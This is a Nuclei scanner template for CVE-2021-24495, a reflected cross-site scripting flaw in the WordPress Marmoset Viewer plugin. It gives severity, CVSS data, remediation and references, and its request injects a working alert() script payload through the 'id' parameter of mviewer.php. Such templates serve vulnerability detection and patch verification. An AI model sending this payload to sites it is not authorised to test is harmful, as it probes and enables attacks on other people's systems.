id: CVE-2021-24495

info:
  name: Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting
  author: johnjhacking
  severity: medium
  description: |
    WordPress Marmoset Viewer plugin before 1.9.3 contains a reflected cross-site scripting vulnerability. It does not properly sanitize, validate, or escape the 'id' parameter before outputting it back in the page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update the WordPress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability.
  reference:
    - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
    - https://wordpress.org/plugins/marmoset-viewer/#developers
    - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24495
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24495
    cwe-id: CWE-79
    epss-score: 0.00116
    epss-percentile: 0.44405
    cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: marmoset
    product: marmoset_viewer
    framework: wordpress
  tags: cve2021,cve,xss,wpscan,wp-plugin,wordpress,intrusive,marmoset

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://"
      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - alert(/{{randstr}}/)
        condition: or

      - type: word
        words:
          - Marmoset Viewer

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ad62d472ea3292c9468e6cb2fd946e3f2d275d92502da6f4c39ce040ba978b140220053b172dcde7c61ebe9b7ed6248cd910e232bb089c8707aaaedb6a4bc7f52f8e:922c64590222798bb761d5b6d8e72950